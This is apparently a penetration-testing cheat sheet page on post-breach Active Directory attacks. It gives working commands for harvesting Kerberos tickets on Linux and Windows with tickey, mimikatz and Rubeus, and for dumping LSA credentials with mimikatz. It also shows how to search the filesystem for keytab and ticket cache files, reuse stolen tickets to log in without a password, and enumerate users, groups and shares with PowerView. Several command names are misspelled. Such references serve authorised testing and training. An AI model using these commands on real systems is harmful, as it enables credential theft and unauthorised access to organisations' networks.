Active Directory

This section mean you have an access to computer that connected to AD. This mean we assume breach on that computer.

Enumerate Juicy Info

Harvest tickets from Linux

Check type and location of tickets:

grep default_ccache_name /etc/krb5.conf

If none return, default is FILE:/tmp/krb5cc_%{uid}.

In case of file tickets, you can copy-paste (if you have permissions) for use them.

In case of being KEYRING tickets, you can use to get them:

# To dump current user tickets, if root, try to dump them all by injecting in other user processes
# to inject, copy tickey in a reachable folder by all users
cp tickey /tmp/tickey
/tmp/tickey -i

Harvest tickets from Windows

With :

mimikatz # sekurlsa::tickets /export

With in Powershell:

.\Rubeus dump

# After dump with Rubeus tickets in base64, to write the in a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))

reference:

krb5.keytab

# Linux cache kerberost ticket

find / -type f -iname "krb5.keytab" 2>/dev/null
find / -type f -iname "krb5cc_*" 2>/dev/null



# Windows cache kerberost ticket

dir "\krb5*.keytab" /s
dir "\krb5cc_*" /s

if you found the krb5cc_* file, just export it to env variable KRB5CCNAME then check with klist

export KRB5CCNAME=/tmp/krb5cc*
klist

# if imported it mean you able to auto logon without password

python3 GetADUsers.py -all -k -no-pass -dc-ip 172.16.x.y <domain>/<username>

PowerView

Import module

powershell -ep bypass
[PS] . .\PowerView.ps1

The Domain Users

Get-NetUser | select cn

# dump the interesting info
Get-NetUser | select cn,lastlogon,logoncount,memberof

The Domain Groups

Get-NetGroup -GroupName *admin*

The Shared Folder

Invoke-SharedFinder

Note: Default shared folder:

ADMIN$
C$
IPC$
NETLOGON
SYSVOL

Net Computer

Get-NetComputer -FullData
Get-NetComputer -FullData |select operatingsystem

Mimikatz

note: must run as administrator

mimikats.exe

privilege::debug
lsadump::lsa /patch

PreviousPost Exploit NextKerberos

Last updated 6 months ago